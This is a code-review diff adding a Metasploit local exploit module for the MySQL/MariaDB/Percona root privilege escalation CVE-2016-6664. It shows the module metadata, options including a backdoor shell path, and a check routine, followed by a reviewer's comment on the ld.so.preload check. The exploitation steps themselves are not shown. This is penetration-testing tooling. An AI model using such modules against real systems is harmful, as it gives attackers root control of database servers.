modules/exploits/linux/local/mysql_priv_esc.rb

```diff
@@ -0,0 +1,221 @@
+          MySQL-based databases including MySQL, MariaDB and Percona are affected
+          by a privilege escalation vulnerability which can let attackers who have
+          gained access to mysql system user to further escalate their privileges
+          to root user allowing them to fully compromise the system.
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'x2020 <x2020@gmail.com>',  # Module
+            'Dawid Golunski'                  # Discovery
+          ],
+        'DisclosureDate' => 'Nov 01 2016',
+        'Platform'       => [ 'linux'],
+        'SessionTypes'  => ['shell', 'meterpreter'],
+        'Targets'       =>
+          [
+            ['Linux x86', {'Arch' => ARCH_X86}],
+            ['Linux x86_64', {'Arch' => ARCH_X86_64}]
+          ],
+        'DefaultTarget'  => 0,
+        'DefaultOptions' =>
+        {
+          #'PrependSetresuid' => true,
+          #'PrependFork' => true,
+          'DisablePayloadHandler' => true
+        },
+        'References'     =>
+          [
+            [ 'EDB', '40679'],
+            [ 'CVE', '2016-6664'],
+            [ 'URL', 'https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html']
+          ]
+      ))
+    register_options(
+      [
+        OptString.new('ErrorLog', [ true, 'The error log file', '/var/log/mysql/error.log' ]),
+        OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
+        OptString.new('BackdoorShell', [ true, 'The shell path', '/bin/bash' ]),
+        OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
+      ], self.class)
+  end
+
+  def check
+
+    def check_reqs?()
+      # should have mysqld_safe running
+      check_command = "if pgrep mysqld; "
+      check_command << "then echo OK; "
+      check_command << "fi"
+      output = cmd_exec(check_command).gsub("\r", '')
+      vprint_status output
+      if output['OK'] == 'OK'
+        vprint_good "mysqld_safe is running"
+        return true
+      end
+      vprint_error "mysqld process not running"
+      true
+    end
+
+    def mysql_user?()
+      # test for mysql user
+      mysql = cmd_exec("id | grep -E '(mysql)'")
+      if not mysql.include?("mysql")
+        print_error "The current session user (#{mysql})is not mysql"
+        return false
+      end
+      vprint_good "The current user is mysql"
+      true
+    end
+
+    def preload_exists?()
+      if exists?("/etc/ld.so.preload")
+        print_error "Found ld.so.preload. Exiting for safety."
+        return true
+      end
+      false
+    end
+
+    def sudo_exists?()
+      @sudo = cmd_exec('which sudo')
+      if @sudo.include?("sudo")
+        return true
+      end
+      false
+    end
+
+    if check_reqs? and mysql_user? and sudo_exists?
+      if preload_exists?
+        return CheckCode::Detected
```

Comment:
The exploit won't work if ld.so.preload is allready present. It doesn't mean that the system isn't vulnerable, it means that the system is at a state that it is not exploitable and executing the exploit could lead to system failure (I think so). Returning `Detected` will indicate that the other 3 conditions are valid. I did't saw any better way to do this.